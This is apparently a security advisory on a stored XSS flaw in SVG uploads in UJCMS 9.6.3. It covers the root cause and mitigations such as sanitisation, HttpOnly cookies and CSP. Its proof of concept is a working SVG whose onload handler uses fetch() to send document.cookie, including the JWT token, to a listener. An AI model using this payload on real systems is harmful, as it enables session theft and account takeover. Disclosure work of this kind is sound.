Stored XSS via file SVG uploads in UJCMS 9.6.3 allows for JWT theft

[cydtseng]

Description:

A Stored Cross-Site Scripting (XSS) vulnerability exists in authenticated SVG file upload and viewing functionality in UJCMS 9.6.3. The vulnerability arises from insufficient sanitization of embedded attributes in uploaded SVG files. When a maliciously crafted SVG file is viewed by other backend users, it allows authenticated attackers to execute arbitrary JavaScript in the context of other backend users' browsers, potentially leading to the theft of sensitive tokens.

Affected Component:

• Endpoint: /cp/#/file/web-file-upload/
• Application Version: 9.6.3

Type of Vulnerability:

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Impact:

• Stored XSS: Attackers can execute arbitrary JavaScript in the victim's browser when they view the malicious SVG file.
• JWT Theft: Sensitive tokens such as jwt-access-token can be stolen, potentially allowing attackers to impersonate victims and access their accounts.

Steps to Reproduce / PoC:

• For local testing, login to the backend and navigate to http://localhost:8080/cp/#/file/web-file-upload/.
• Notice the jwt-access-token does not have HttpOnly set, we can thus access it with JavaScript.
• Start a Python HTTP server on localhost port 8888 to wait for exfiltrated JWT.
• Upload an SVG file with attribute onload defined to any arbitrary JavaScript document cookie exfiltration logic.

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('http://localhost:8888', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
});">
    <circle cs="50" cy="50" r="40"/>
</svg>

• After clicking on 'Browse' for the malicious SVG file, the sensitive tokens can be received by the attacker.

Root Cause:

The application fails to properly sanitize SVG file contents, specifically attributes like onload, which allow the execution of JavaScript code. This results in malicious SVG files being stored and rendered in the backend without validation. Additionally, the lack of HttpOnly flag on sensitive cookies (e.g., jwt-access-token) allows JavaScript to access these tokens, increasing the attack's severity.

Mitigation Recommendations:

1. SVG File Sanitization:
   Use a robust library to sanitize SVG files during upload, ensuring malicious attributes like onload are removed or escaped. Tools like DOMPurify can help with this.

2. Secure Cookie Attributes:
   Set the HttpOnly flag on sensitive cookies to prevent access via JavaScript.
   Use the Secure flag to restrict cookies to HTTPS connections.

3. Content Security Policy (CSP):
   Implement a CSP to limit the execution of inline JavaScript or restrict resource loading to trusted domains.

4. Strict Input Validation:
   Validate and sanitize all inputs, especially for file uploads, to prevent injection of malicious content.

5. Restrict SVG Rendering:
   Disable rendering of uploaded SVG files in the browser if possible. Convert SVGs to safer formats like PNG before display.

6. Token Revocation and Rotation:
   Regularly rotate sensitive tokens and implement revocation mechanisms to minimize the impact of token theft.